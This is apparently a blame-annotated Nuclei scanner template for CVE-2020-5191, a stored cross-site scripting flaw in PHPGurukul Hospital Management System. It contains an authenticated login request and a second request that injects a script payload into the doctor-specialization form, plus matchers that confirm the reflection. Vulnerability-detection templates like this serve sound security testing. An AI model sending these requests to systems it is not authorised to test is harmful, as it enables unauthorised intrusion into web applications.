2022-08-27 06:09:36 +00:00
id : CVE-2020-5191
2022-08-27 14:09:13 +00:00
2022-08-27 06:09:36 +00:00
info :
2022-09-08 13:28:46 +00:00
name : PHPGurukul Hospital Management System - Cross-Site Scripting
2022-08-27 06:09:36 +00:00
author : TenBird
2022-08-27 14:09:13 +00:00
severity : medium
description : |
2022-09-08 13:28:46 +00:00
PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
2022-08-27 06:09:36 +00:00
reference :
2022-08-27 14:09:13 +00:00
- https://www.exploit-db.com/exploits/47841
2022-08-30 06:13:42 +00:00
- https://phpgurukul.com/hospital-management-system-in-php/
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-5191
2022-08-27 06:09:36 +00:00
classification :
2022-08-30 06:13:42 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-08-27 06:09:36 +00:00
cve-id : CVE-2020-5191
2022-08-30 06:13:42 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:phpgurukul:hospital_management_system_in_php:*:*:*:*:*:*:*:*
epss-score : 0.00311
2022-08-27 14:09:13 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2022-08-30 06:13:42 +00:00
tags : cve2020,hms,cms,xss,authenticated,edb,cve
2022-08-27 06:09:36 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-27 06:09:36 +00:00
- raw :
- |
POST /hospital/hms/admin/index.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-08-27 14:09:13 +00:00
2022-08-27 06:12:21 +00:00
username={{username}}&password={{password}}&submit=&submit=
2022-08-27 14:09:13 +00:00
2022-08-27 06:09:36 +00:00
- |
POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-08-27 14:09:13 +00:00
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
2022-08-27 06:09:36 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-08-27 14:09:13 +00:00
max-redirects : 2
2022-08-27 06:09:36 +00:00
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-08-30 05:45:06 +00:00
- '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
2022-08-27 14:09:13 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200